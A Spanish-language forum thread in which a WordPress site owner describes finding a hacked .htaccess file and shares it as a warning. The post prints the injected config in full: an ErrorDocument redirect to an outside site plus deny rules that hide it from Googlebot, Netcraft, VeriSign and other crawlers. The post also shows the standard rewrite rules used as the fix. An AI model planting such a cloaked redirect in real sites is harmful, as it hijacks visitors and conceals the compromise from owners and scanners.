Tema: Cuidado con Hackeo vía .htaccess

Hoola chicos! Sucede que hace unos momentos estaba revisando las estadísticas de mi sitio PortalMovil.net en Google Anañytics y encontré un enorme bajón en las visitas a partir del pasado Lunes 2 de noviembre hasta hoy.

Extrañado, pensé que era alguna penalización o algo así pero corroboré que el sitio sigue apareciendo entre los resultados de Google por lo que fui a revisar la web y encontré que al momento de acceder al sitio todo se mostraba normal, pero al entrar a un post redirigía a este sitio: http://www.cashpoint.com.au/c3dfd5/online

Me alarmó mucho y fui a revisar los ficheros del theme pero no encontre nada extraño, aunque recordé que hace unas semanas atrás extrañamente el fichero .htaccess del sitio había desaparecido sin más y en los posts salía el error 404 de HostGator. Así pues accedí por FTP a la raiz del dominio y grande fue mi sorpresa al abrir el fichero .htaccess que estaba ahí, contenía esto:

Código:

ErrorDocument 404 http://www.cashpoint.com.au/c3dfd5/online
order allow,deny
deny from .netcraft.com
deny from 194.72.238
deny from .googlebot.com
deny from .verisign.com
deny from .aol.com
deny from .msn.com
deny from .internetidentity.com
deny from .yahoo.net
deny from .ask.com
deny from 192.92.126.135
deny from 64.
deny from 66.
deny from 76.
deny from 209.
allow from all

Obviamente había sido víctima de algún hackeo aunque pienso que no fue a mi cuenta de FTP "maestra" (que tiene acceso a todos los directorios de mi hosting en donde por supuesto están alojados todos mis sitios), sino que fue a la cuenta FTP específica para ese dominio y que solo da acceso a la raiz del mismo.

Lo comento por que si hay alguien del foro al que le haya sucedido algo igual, revise primero el fichero .htaccess de su sitio para ver si todo está normal. Yo por el momento cambié la contraseña de la cuenta FTP que al parecer es la afectada y voy a hablar con un amigo que era el único que sabía la contraseña de la misma, tal vez él la haya perdido o algo así.

P.D. El problema lo solucioné corrigiendo el fichero .htaccess con las directrices que WP necesita para funcionar con permalinks amigables, que es ésta:

Código:

# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>

# END WordPress

Gracias por la info.
Pero claro que estas cosas asustan, mientras unos trabajamos duro otros hijuemadres hackean blogs.

Mmmm pero seguro que fue a tu cuenta ftp? puede ser un bug de wordpress.

quizás el archivo .htaccess tenía permisos 777 y eso pudo causar el probelma?

Gracias!

A mi me paso por medio de un bug de wordpres... en la version 2.8.4 dando acceso al wp_settings y de hay a moverle a todo el sitio....

Capaz que mis visitas sean 10K y por eso solo tengo 1,2K (i)


Uhhh, yo creo que fue un bug de Wordpress , que bueno que lo solucionaste Alan

Pues no se si sea de WordPress, al menos no el que dicen del 2.8.4 porque desde que salió el 2.8.5 actualicé todos mis sitios enseguida.

Anyway, lo compartí con todos en caso de que lleguen a sufrir una situación similar =S

genial. gracias por compartirlo.

Gracias por el dato amigo, lo tendré en cuenta